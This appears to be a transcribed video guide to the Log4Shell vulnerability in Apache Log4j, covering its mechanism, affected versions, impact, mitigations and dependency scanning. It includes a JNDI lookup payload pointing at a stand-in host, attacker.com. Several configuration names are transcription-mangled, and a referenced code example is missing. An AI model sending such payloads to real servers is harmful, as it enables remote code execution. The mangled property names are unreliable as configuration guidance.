Download this code from codegive.com, link in the description below. Log4j Log4 Shell Vulnerability, a comprehensive guide. Overview. The Log4 Shell Vulnerability, CVE 2021-44228, is a critical security flaw found in Apache Log4j, a popular logging library for Java applications. This vulnerability allows remote code execution, RCE, by manipulating log messages, enabling attackers to execute arbitrary code on the server. Discovered in December 2021, it has significant implications due to the widespread use of Log4j in various software applications. How the vulnerability works. The vulnerability arises from Log4j's handling of log messages containing user-controlled data. The library can interpret certain strings in log messages as commands to be executed. Specifically, it uses the Java Naming and Directory Interface, JNDI, to perform lookups, which can be exploited to load malicious code from remote servers. Example of exploit. An attacker can send a malicious payload to a vulnerable server. In this example, if the server logs the username, Log4j will process the $JNDLDAP//attacker.com/a string, leading to a lookup to an attacker-controlled LDAP server. Affected versions. The Log4j vulnerability affects all versions of Log4j from 2.0 beta 9 to 2.14.1. Versions 2.15.0 and later have mitigations for this vulnerability. Impact. The potential impact of this vulnerability is severe and includes remote code execution, data exfiltration, server takeover, compromise of sensitive information. Mitigation. 1. Upgrade Log4j. The most effective way to mitigate this vulnerability is to upgrade to Log4j 2.15.0, temporary fix. Log4j 2.17.0 or later, permanent fix. 2. Configuration changes. If upgrading is not possible, you can mitigate the vulnerability by setting the system property log4j2.format message no lookups to true. Removing the JND lookup class from the class path. 3. Firewall rules. Implement firewall rules to block outgoing requests to untrusted or suspicious domains. Code example. Here's a simple Java application that uses Log4j for logging. We will illustrate how the vulnerability could be exploited. In this scenario, if the above application is logging the user input string, it can be exploited as described earlier. How to check for vulnerability. 1. Scan dependencies. Check your project dependencies for Log4j versions using tools like MVN Dependency Tree for Maven or Gradle dependencies for Gradle. 2. Use security scanners. Tools like SNYK, Dependabot, or OWASP Dependency Check can help identify vulnerable dependencies in your code base. Conclusion. Log4 Shell is a critical vulnerability that requires immediate attention for any application utilizing the Log4j library. Organizations should prioritize patching, configuration changes, and monitoring to mitigate the risks associated with this vulnerability. Always keep your dependencies updated and monitor for emerging threats to maintain a secure application environment.